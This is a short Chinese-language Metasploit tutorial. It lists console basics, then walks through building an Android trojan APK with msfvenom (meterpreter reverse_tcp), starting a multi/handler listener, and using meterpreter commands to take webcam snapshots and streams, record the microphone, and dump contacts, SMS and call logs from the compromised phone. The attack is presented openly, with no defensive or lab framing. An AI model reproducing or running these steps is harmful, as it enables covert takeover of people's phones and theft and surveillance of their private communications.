一、metasploit基础命令
1、banner命令是查看metasploit的版本
2、help命令,是显示帮助信息
3、exit命令,退出msfconsole
4、color命令,修改颜色
5、load命令是载入插件
6、set设置命令
7、search命令是搜索,例我们搜索ms08漏洞
8、show options列出某个渗透攻击或模块中所有的配置参数。
9、LHOST你本地可以让目标主机连接的IP地址,通常当目标主机不在同一个局域网内时,就需要是一个公共IP地址,特别为反弹式shell使用。RHOST远程主机或是目标主机。
10、exploit执行渗透攻击或模块来攻击目标。输入exploit后,点击回车,就开始攻击了。
二、示例( 生成木马侵入手机 ):
1.打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件(生成apk木马程序)。
msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 > /root/apk.apk #生成apk木马,设置本机ip与自定义端口
然后启动msf:
msfconsole
1.use exploit/multi/handler //加载模块 2. set payload android/meterpreter/reverse_tcp //选择Payload 3.show options //查看参数设置 这个payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置 1.set LHOST 172.23.0.209 //这里的地址设置成我们刚才生成木马的IP地址 2.set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口 3.exploit //开始执行漏洞 开始监听,等待手机上线
目标上线成功示例(当目标上线成功后,会回显出命令行):
2. 控制androiud的命令:
sysinfo //查看手机信息
webcam_list //列出网络摄像头
webcam_stream //开启摄像头
webcam_snap //从指定的摄像头获取快照
webcam_chat //开始视频聊天
dump_contacts //导出电话号码
dump_sms //导出信息
record_mic [ˈrekərd] /记录/ 从默认麦克风录制音频为X秒
check_root //检查设备是否有根
dump_calllog //获取调用日志
dump_contacts //获取联系人列表
dump_sms //获取短信
? //查看更多命令